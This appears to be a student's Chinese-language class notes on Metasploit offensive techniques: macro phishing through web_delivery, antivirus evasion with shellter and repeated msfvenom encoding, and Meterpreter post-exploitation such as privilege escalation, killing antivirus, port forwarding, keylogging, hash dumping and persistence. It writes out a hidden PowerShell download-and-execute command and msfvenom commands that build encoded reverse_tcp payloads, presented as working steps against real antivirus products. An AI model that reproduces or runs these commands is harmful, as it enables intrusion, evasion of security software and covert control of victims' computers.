复习昨天的内容 毕竟我没有认真听
msf宏钓鱼
1.先进msf控制台:msfconsle clear
2.search web_delivery
3.use 1 options
4.show targets
5.set target 2
6.options
7.set payload windows/x64/meterpreter/reverse_tcp
9.set lhost kali 回车ip set lport 1121 回车 run
10.用生成好的命令交给被攻击的cmd 或者powershell
11.结束后老大的补充
长度或者其他不明情况不能正常运行run出来的代码
就使用下面这张图的命令运行
poweshell -w hidden -nop IEX (New Obeject Net WebClient) DownloadString ("")run里面的网址
这个网址其实是一个exe下载的网址
ps:windows CMD 的清屏命令cls
补充的防护问题:
shell.exe
个人租的阿里云的服务器vps可以使用这个方法
安全狗也行
360不行 360需要老大教的其他方法
今天的正式讲课 免杀
5.0基本废了
一般用最新的 5.020年就废了
360 火绒可能还能过 win10 自带防火墙 最难
所以老大不讲了因为作用基本不大了
要用的话看看下图就行
老师的示例:
这张图过后使用options
然后
然后run
然后show evasion
捆绑免杀
shellter免杀
官网免费版下好后启动之后这样操作:
好了之后如下图:
L回车
1
输入ip 和 端口 实战使用 公网ip
然后msf开启侦听 如下图
然后老大开始实战 发现360没发现
但是创建新用户360发现了
另一种免杀利用python 在编码免杀失效和这个一起使用
、
老大这样写的不知道为什么
第一张图这样写 似乎是反复增强免杀效果 反复编码
msfvenon -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=1121 -b "x00" -e x86shikata_ga_na -i 20 | msfvenom -a x86 --platform windows -e x86/alpha_upper -i 10 -f exe -o shell2.exe
第二个这样写
msfvenon -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=1121 -b "x00" -e x86shikata_ga_na -i 10 -f py -o msf.py
然后生成好的msf.py
,模板覆盖到如下图所示文件当中
之后将文件复制到如图的地方
pythoninstaller msf.py
这个步骤是将 刚刚准备好的模板 弄成 cmd识别出来的命令
然后安杀毒软件实验免杀效果 老大说很玄学 有的杀毒过不了 有的杀毒可能就过得了
gihub的免杀方法
ps:-help列出来的模块不一定全能用 一是因为你的权限 二是你连接的操作系统
MSF后渗透模块深入
第一个自动迁移最好不要用 最好手动迁移 不然可能会降权
关杀软进程很难 一般我们用服务关360
!!!停止服务后需要重启 重启对方电脑之前需要权限维持!!
后渗透模块基本命令操作
run post/ 看有哪些提取信息的功能可以百度
然后后面可以跟给你列v出来的功能 run post/........
可以upload上传提权文件
注意 用linux斜杠/ windows斜杠要\\很麻烦
run VNC怎么修改只读 而是能移动桌面
102行添加 如下图
老大改的有点问题 以后我要用自己找找方法吧
其它基本命令参数
run getgui -e 失败怎么办?
先查看权限 getuid
然后开始提权
search suggest 看提权模块
会帮你把这个电脑缺的漏洞全都给你列举出来
然后如下操作
use3
set session 1
run
然后如下操作
然后再次 set session 1
show targets
然后能查找所有文件 我们就要开始寻找这些文件
除了提权另一种方法开启3389端口 cmd命令
摄像头命令
端口转发
![](https://i-blog.csdnimg.cn/blog_migrate/c439926ee1c32b4ca925751eaaea7efa.png)
内网开了3389 我们在外面该怎么办
建立隧道
然后如下图 然后 yes 就可以远程桌面了
外网远程连接桌面 开隧道
物理机直接通过kali kaili通过隧道 隧道 到 win7
物理机打开远程桌面 连接kali的1138端口 看到的不是 kali界面 而是被黑入的win7界面
另一个例子
现在
和win7处于同一个内网的80.128的服务器 开了80端口 ip地址是80.128现在我们该黑这个电脑
1.通过后渗透模块 将80.128的80 端口转发在我们kali的81上
这样 访问我们的81 就相当于访问80.128
又或者 它开了一个445的端口 我们用nmap扫描 发现这个端口有ms17-010漏洞
然后可以端口转发到我们本地 我们打我们自己相当于打他
补充 :只要win7能访问到 内网的一些服务器的端口就可以使用端口转发
、
shell网络环境 分析被黑电脑有没有其他网络 然后访问其他内网
小ps
不需要
键盘记录
Hash获取
提示用另一个 这是针对32位的 如下
下图权限不够提示
2012以上不能读明文
抓包嗅探
盗取令牌 盗取用户身份 提权
安装后门持久控制服务器 建议CS 我不经常用 这个就是权限维持
权限维持推荐方法:
上面3个绕过检测 的方法也有 以后讲 用CS